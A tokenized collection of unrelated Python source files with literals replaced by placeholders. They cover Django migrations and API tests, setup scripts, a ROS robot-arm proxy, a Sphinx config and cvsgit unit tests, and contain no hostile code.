max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:1000> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:1000> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . PositiveIntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . PositiveIntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> import requests <EOL> from django . core . management . base import BaseCommand <EOL> from django . core . files . uploadedfile import SimpleUploadedFile <EOL> from shop import api as shop_api <EOL> IMAGE_URL = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> products = shop_api . list_products ( ) <EOL> for product in products : <EOL> url = IMAGE_URL . format ( ean = product . code ) <EOL> response = requests . get ( url ) <EOL> if response . status_code == <NUM_LIT:200> : <EOL> f = SimpleUploadedFile ( '<STR_LIT>' , response . content , <EOL> '<STR_LIT>' ) <EOL> shop_api . update_product ( product . id , image = f ) </s>
<s> import factory . fuzzy <EOL> from . . import models <EOL> class AccountFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = models . Account <EOL> card_id = factory . fuzzy . FuzzyInteger ( <NUM_LIT:0> , ( <NUM_LIT:1> << <NUM_LIT:32> ) - <NUM_LIT:1> ) </s>
<s> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import with_statement , absolute_import <EOL> import os <EOL> stable_version = '<STR_LIT>' <EOL> target_version = '<STR_LIT>' <EOL> is_release = stable_version == target_version <EOL> try : <EOL> from setuptools import setup <EOL> has_setuptools = True <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> has_setuptools = False <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> os . chdir ( '<STR_LIT>' ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as f : <EOL> f . readline ( ) <EOL> this_version = f . readline ( ) . split ( ) [ - <NUM_LIT:1> ] . strip ( "<STR_LIT:'>" ) <EOL> os . chdir ( '<STR_LIT:..>' ) <EOL> elif stable_version == target_version : <EOL> this_version = target_version <EOL> else : <EOL> this_version = target_version + '<STR_LIT>' <EOL> if is_release : <EOL> from datetime import date <EOL> today = "<STR_LIT>" . join ( date . isoformat ( date . today ( ) ) . split ( '<STR_LIT:->' ) ) <EOL> this_version += "<STR_LIT:->" + today <EOL> with open ( '<STR_LIT>' ) as file : <EOL> license_text = file . read ( ) <EOL> long_description = """<STR_LIT>""" % { '<STR_LIT>' : stable_version , '<STR_LIT>' : this_version } <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as file : <EOL> file . write ( long_description ) <EOL> def write_info_py ( filename = '<STR_LIT>' ) : <EOL> contents = """<STR_LIT>""" <EOL> with open ( filename , '<STR_LIT:w>' ) as file : <EOL> file . write ( contents % { '<STR_LIT>' : this_version , <EOL> '<STR_LIT>' : stable_version , <EOL> '<STR_LIT>' : long_description , <EOL> '<STR_LIT>' : license_text } ) <EOL> return <EOL> write_info_py ( ) <EOL> setup_code = """<STR_LIT>""" % ( target_version , long_description ) <EOL> ctypes_version = '<STR_LIT>' <EOL> objgraph_version = '<STR_LIT>' <EOL> pyreadline_version = '<STR_LIT>' <EOL> import sys <EOL> if has_setuptools : <EOL> setup_code += """<STR_LIT>""" <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> setup_code += """<STR_LIT>""" % ( pyreadline_version ) <EOL> elif hex ( sys . hexversion ) < '<STR_LIT>' : <EOL> setup_code += """<STR_LIT>""" % ( ctypes_version ) <EOL> setup_code += """<STR_LIT>""" <EOL> exec ( setup_code ) <EOL> try : <EOL> import ctypes <EOL> import readline <EOL> except ImportError : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ctypes_version ) <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" % pyreadline_version ) <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pass </s>
<s> import djgunicorn <EOL> from setuptools import setup , find_packages <EOL> version = djgunicorn . __version__ <EOL> with open ( '<STR_LIT>' ) as f : <EOL> readme = f . read ( ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> history = f . read ( ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> install_requires = f . read ( ) . strip ( ) . splitlines ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = """<STR_LIT>""" , <EOL> long_description = readme + '<STR_LIT>' + history , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = install_requires , <EOL> license = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> keywords = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from . devicelist import ( <EOL> ChannelList , <EOL> ChannelInfo , <EOL> DevicePINInfo , <EOL> DeviceTokenList , <EOL> DevicePINList , <EOL> APIDList , <EOL> Feedback , <EOL> ) <EOL> from . tag import ( <EOL> TagList , <EOL> Tag , <EOL> DeleteTag , <EOL> BatchTag , <EOL> ) <EOL> from . segment import ( <EOL> Segment , <EOL> SegmentList <EOL> ) <EOL> from . channel_uninstall import ( <EOL> ChannelUninstall <EOL> ) <EOL> from . named_users import ( <EOL> NamedUser , <EOL> NamedUserList <EOL> ) </s>
<s> import logging <EOL> from gevent import Greenlet , sleep <EOL> from shaveet . config import MAX_CLIENTS_GC , CLIENT_GC_INTERVAL <EOL> from shaveet . lookup import all_clients , discard_client <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class ClientGC ( Greenlet ) : <EOL> """<STR_LIT>""" <EOL> def run ( self ) : <EOL> while True : <EOL> logger . info ( "<STR_LIT>" ) <EOL> client_processed = <NUM_LIT:0> <EOL> for client_id , client in all_clients ( ) . iteritems ( ) : <EOL> if not client . is_active ( ) : <EOL> logger . debug ( "<STR_LIT>" , client . id , client . ts , client . is_waiting ) <EOL> discard_client ( client ) <EOL> client_processed += <NUM_LIT:1> <EOL> if client_processed % MAX_CLIENTS_GC == <NUM_LIT:0> : <EOL> sleep ( <NUM_LIT:0> ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> sleep ( CLIENT_GC_INTERVAL ) </s>
<s> import sys , os <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import copy <EOL> import rospy <EOL> import moveit_commander <EOL> from base_proxy import BaseProxy , ProxyCommand <EOL> from trajectory_msgs . msg import JointTrajectoryPoint <EOL> from control_msgs . msg import FollowJointTrajectoryAction , FollowJointTrajectoryGoal <EOL> import actionlib <EOL> class YoubotGazeboProxy ( BaseProxy ) : <EOL> arm_joint_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> gripper_joint_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> end_effector_link = "<STR_LIT>" <EOL> def __init__ ( self , node_name ) : <EOL> rospy . logdebug ( "<STR_LIT>" ) <EOL> super ( YoubotGazeboProxy , self ) . __init__ ( ) <EOL> self . init_done = False <EOL> rospy . init_node ( node_name , anonymous = True ) <EOL> rospy . loginfo ( "<STR_LIT>" + rospy . get_name ( ) ) <EOL> rospy . loginfo ( "<STR_LIT>" + rospy . get_namespace ( ) ) <EOL> rospy . loginfo ( "<STR_LIT>" + rospy . get_node_uri ( ) ) <EOL> self . arm_num = rospy . get_param ( "<STR_LIT>" ) <EOL> self . _arm_as_name = '<STR_LIT>' + str ( self . arm_num ) + '<STR_LIT>' <EOL> self . _gripper_as_name = '<STR_LIT>' + str ( self . arm_num ) + '<STR_LIT>' <EOL> try : <EOL> moveit_commander . roscpp_initialize ( sys . argv ) <EOL> self . arm_group = moveit_commander . MoveGroupCommander ( "<STR_LIT>" ) <EOL> self . arm_group . set_planning_time ( <NUM_LIT:8> ) <EOL> self . arm_group . set_pose_reference_frame ( "<STR_LIT>" ) <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> self . _ac_arm = actionlib . SimpleActionClient ( self . _arm_as_name , FollowJointTrajectoryAction ) <EOL> self . _ac_arm . wait_for_server ( ) <EOL> rospy . loginfo ( "<STR_LIT>" + self . _arm_as_name ) <EOL> self . _ac_gripper = actionlib . SimpleActionClient ( self . _gripper_as_name , FollowJointTrajectoryAction ) <EOL> self . _ac_gripper . wait_for_server ( ) <EOL> rospy . loginfo ( "<STR_LIT>" + self . _gripper_as_name ) <EOL> self . init_done = True <EOL> def plan_arm ( self , pose ) : <EOL> '''<STR_LIT>''' <EOL> if self . init_done == False : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . arm_group . clear_pose_targets ( ) <EOL> self . arm_group . set_pose_target ( pose , self . _end_effector_link ) <EOL> plan = self . arm_group . plan ( ) <EOL> if len ( plan . joint_trajectory . points ) == <NUM_LIT:0> : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> self . _arm_goal = None <EOL> return False <EOL> else : <EOL> rospy . loginfo ( "<STR_LIT>" + str ( len ( plan . joint_trajectory . points ) ) ) <EOL> self . _arm_goal = FollowJointTrajectoryGoal ( ) <EOL> self . _arm_goal . trajectory = copy . deepcopy ( plan . joint_trajectory ) <EOL> return True <EOL> def move_arm ( self ) : <EOL> self . _ac_arm . send_goal ( self . _arm_goal , feedback_cb = self . move_arm_feedback_cb ) <EOL> self . _ac_arm . wait_for_result ( ) <EOL> return self . _ac_arm . get_result ( ) <EOL> def move_arm_feedback_cb ( self ) : pass <EOL> def move_gripper ( self , opening_mm ) : <EOL> goal = FollowJointTrajectoryGoal ( ) <EOL> goal . trajectory . joint_names = self . gripper_joint_names <EOL> jtp = JointTrajectoryPoint ( ) <EOL> jtp . positions = [ opening_mm / <NUM_LIT> , opening_mm / <NUM_LIT> ] <EOL> jtp . velocities = [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> jtp . time_from_start = rospy . Duration ( <NUM_LIT:1.0> ) <EOL> goal . trajectory . points . append ( jtp ) <EOL> self . _ac_gripper . send_goal ( goal ) <EOL> self . _ac_gripper . wait_for_result ( ) <EOL> return self . _ac_gripper . get_result ( ) <EOL> def control_loop ( self ) : <EOL> if self . commands is None : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> for cmd in self . commands : <EOL> self . wait_for_state ( self . _proxy_state_running ) <EOL> cmd_spec_str = None <EOL> spec = None <EOL> t = cmd [ ProxyCommand . key_command_type ] <EOL> if not ( t == "<STR_LIT>" ) : <EOL> cmd_spec_str = cmd [ ProxyCommand . key_command_spec ] <EOL> if not isinstance ( cmd_spec_str , basestring ) : <EOL> spec = float ( cmd_spec_str ) <EOL> else : <EOL> spec = self . positions [ cmd_spec_str ] <EOL> rospy . loginfo ( "<STR_LIT>" + t + "<STR_LIT>" + str ( cmd_spec_str ) + "<STR_LIT>" + str ( spec ) ) <EOL> self . wait_for_depend ( cmd ) <EOL> if t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> self . wait_for_depend ( cmd ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> v = float ( spec ) <EOL> rospy . sleep ( v ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> self . move_gripper ( spec ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> rospy . logdebug ( spec ) <EOL> goal = FollowJointTrajectoryGoal ( ) <EOL> goal . trajectory . joint_names = self . arm_joint_names <EOL> jtp = JointTrajectoryPoint ( ) <EOL> jtp . time_from_start = rospy . Duration ( <NUM_LIT:0.5> ) <EOL> jtp . positions = spec <EOL> jtp . velocities = [ <NUM_LIT:0> ] * len ( spec ) <EOL> goal . trajectory . points . append ( jtp ) <EOL> self . _arm_goal = copy . deepcopy ( goal ) <EOL> self . move_arm ( ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> raise NotImplementedError ( ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + str ( cmd . type ) ) <EOL> self . set_depend ( cmd ) <EOL> self . clear_depend ( cmd ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from time import sleep , time <EOL> import datetime <EOL> from openduty . serializers import NoneSerializer <EOL> from openduty . models import Incident <EOL> from rest_framework . response import Response <EOL> from rest_framework import status <EOL> from rest_framework import viewsets <EOL> from . celery import add <EOL> from random import randint <EOL> class HealthCheckViewSet ( viewsets . ModelViewSet ) : <EOL> queryset = Incident . objects . all ( ) <EOL> serializer_class = NoneSerializer <EOL> def list ( self , request ) : <EOL> try : <EOL> firstincident = Incident . objects . first ( ) <EOL> except Exception : <EOL> return Response ( "<STR_LIT>" , status = status . HTTP_500_INTERNAL_SERVER_ERROR ) <EOL> return Response ( "<STR_LIT:OK>" , status = status . HTTP_200_OK ) <EOL> class CeleryHealthCheckViewSet ( viewsets . ModelViewSet ) : <EOL> queryset = Incident . objects . all ( ) <EOL> serializer_class = NoneSerializer <EOL> def list ( self , request ) : <EOL> try : <EOL> timestamp = int ( time ( ) ) <EOL> random = randint ( <NUM_LIT:0> , <NUM_LIT> ) <EOL> result = add . apply_async ( args = [ timestamp , random ] ) <EOL> now = datetime . datetime . now ( ) <EOL> while ( now + datetime . timedelta ( seconds = <NUM_LIT:10> ) ) > datetime . datetime . now ( ) : <EOL> if result . result == timestamp + random : <EOL> return Response ( "<STR_LIT:OK>" , status = status . HTTP_200_OK ) <EOL> sleep ( <NUM_LIT:0.5> ) <EOL> except IOError : <EOL> pass <EOL> return Response ( "<STR_LIT>" , status = status . HTTP_500_INTERNAL_SERVER_ERROR ) </s>
<s> from django . utils import timezone <EOL> from openduty . models import Service , ServiceTokens , Token , SchedulePolicy , Incident <EOL> from rest_framework . reverse import reverse <EOL> from rest_framework . test import APIRequestFactory , APIClient <EOL> from . shared import BaseTestCase , random_string <EOL> class TestAPI ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestAPI , self ) . setUp ( ) <EOL> self . sp = SchedulePolicy ( name = random_string ( ) , repeat_times = <NUM_LIT:1> ) <EOL> self . sp . save ( ) <EOL> self . service = Service ( name = random_string ( ) , policy = self . sp ) <EOL> self . service . save ( ) <EOL> self . token = Token ( key = "<STR_LIT>" ) <EOL> self . token . save ( ) <EOL> self . servicetoken = ServiceTokens ( name = "<STR_LIT>" , service_id = self . service , token_id = self . token ) <EOL> self . servicetoken . save ( ) <EOL> self . service2 = Service ( name = random_string ( ) , policy = self . sp ) <EOL> self . service2 . save ( ) <EOL> self . token2 = Token ( key = "<STR_LIT>" ) <EOL> self . token2 . save ( ) <EOL> self . servicetoken2 = ServiceTokens ( name = "<STR_LIT>" , service_id = self . service2 , token_id = self . token2 ) <EOL> self . servicetoken2 . save ( ) <EOL> def tearDown ( self ) : <EOL> super ( TestAPI , self ) . tearDown ( ) <EOL> try : <EOL> self . servicetoken . delete ( ) <EOL> self . servicetoken2 . delete ( ) <EOL> self . token2 . delete ( ) <EOL> self . token . delete ( ) <EOL> self . service2 . delete ( ) <EOL> self . service . delete ( ) <EOL> self . sp . delete ( ) <EOL> except : <EOL> pass <EOL> def test_create_event ( self ) : <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> new_instance = Incident . objects . get ( incident_key = '<STR_LIT>' ) <EOL> self . assertEqual ( "<STR_LIT>" , new_instance . incident_key ) <EOL> self . assertEqual ( Incident . TRIGGER , new_instance . event_type ) <EOL> self . assertEqual ( self . service , new_instance . service_key ) <EOL> finally : <EOL> pass <EOL> def test_create_event_fails_with_invalid_key ( self ) : <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> finally : <EOL> pass <EOL> def inject_incident ( self ) : <EOL> incident = Incident ( ) <EOL> incident . service_key = self . service <EOL> incident . event_type = Incident . TRIGGER <EOL> incident . incident_key = "<STR_LIT>" <EOL> incident . description = "<STR_LIT:test>" <EOL> incident . details = "<STR_LIT:test>" <EOL> incident . occurred_at = timezone . now ( ) <EOL> incident . save ( ) <EOL> def test_create_event_different_service ( self ) : <EOL> self . inject_incident ( ) <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token2 . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> incidents = Incident . objects . all ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , incidents . count ( ) ) <EOL> finally : <EOL> pass <EOL> def test_incident_recovery ( self ) : <EOL> self . inject_incident ( ) <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> updated = Incident . objects . get ( incident_key = '<STR_LIT>' ) <EOL> self . assertEqual ( Incident . RESOLVE , updated . event_type ) <EOL> finally : <EOL> updated . delete ( ) <EOL> def test_incident_acknowledge ( self ) : <EOL> self . inject_incident ( ) <EOL> try : <EOL> client = APIClient ( ) <EOL> response = client . post ( <EOL> '<STR_LIT>' , <EOL> data = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . token . key , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : "<STR_LIT:test>" <EOL> } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> updated = Incident . objects . get ( incident_key = '<STR_LIT>' ) <EOL> self . assertEqual ( Incident . ACKNOWLEDGE , updated . event_type ) <EOL> finally : <EOL> updated . delete ( ) </s>
<s> import os <EOL> from os . path import dirname , join , isfile <EOL> from shutil import rmtree <EOL> import unittest <EOL> from cvsgit . command . init import init <EOL> from cvsgit . command . clone import Clone <EOL> from cvsgit . command . pull import pull <EOL> from cvsgit . command . verify import Verify <EOL> from cvsgit . git import Git <EOL> from cvsgit . utils import Tempdir <EOL> class Test ( unittest . TestCase ) : <EOL> def test_clone ( self ) : <EOL> """<STR_LIT>""" <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , source ) , <NUM_LIT:0> ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Verify ( ) . eval ( ) ) <EOL> rcs_mode = os . stat ( join ( source , '<STR_LIT>' ) ) . st_mode <EOL> wc_mode = os . stat ( '<STR_LIT>' ) . st_mode <EOL> self . assertTrue ( ( rcs_mode & <NUM_LIT:0> <NUM_LIT> ) != <NUM_LIT:0> ) <EOL> self . assertEquals ( rcs_mode , wc_mode ) <EOL> def test_clone_bare ( self ) : <EOL> """<STR_LIT>""" <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , source ) , <NUM_LIT:0> ) <EOL> self . assertTrue ( isfile ( join ( tempdir , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> def test_clone_with_zombie_rcs_file ( self ) : <EOL> """<STR_LIT>""" <EOL> with Tempdir ( cwd = True ) : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , source ) ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> def test_clone_partial_alternative ( self ) : <EOL> """<STR_LIT>""" <EOL> head1 = None <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Clone ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , source ) ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> head1 = Git ( ) . rev_parse ( '<STR_LIT>' ) <EOL> head2 = None <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , init ( ) . eval ( '<STR_LIT>' , source ) ) <EOL> self . assertEquals ( <NUM_LIT:0> , pull ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( head1 , Git ( ) . rev_parse ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:0> , pull ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( head1 , Git ( ) . rev_parse ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:0> , pull ( ) . eval ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertEqual ( head1 , Git ( ) . rev_parse ( '<STR_LIT>' ) ) <EOL> def test_git_clone_from_cvs_clone ( self ) : <EOL> """<STR_LIT>""" <EOL> head1 = None <EOL> with Tempdir ( cwd = True ) as tempdir : <EOL> source = join ( dirname ( __file__ ) , '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , Clone ( ) . eval ( '<STR_LIT>' , source , '<STR_LIT>' ) ) <EOL> Git ( ) . check_command ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( Git ( '<STR_LIT>' ) . rev_parse ( '<STR_LIT>' ) , <EOL> Git ( '<STR_LIT:test>' ) . rev_parse ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( '<STR_LIT>' , <EOL> Git ( '<STR_LIT:test>' ) . symbolic_ref ( '<STR_LIT>' ) ) </s>
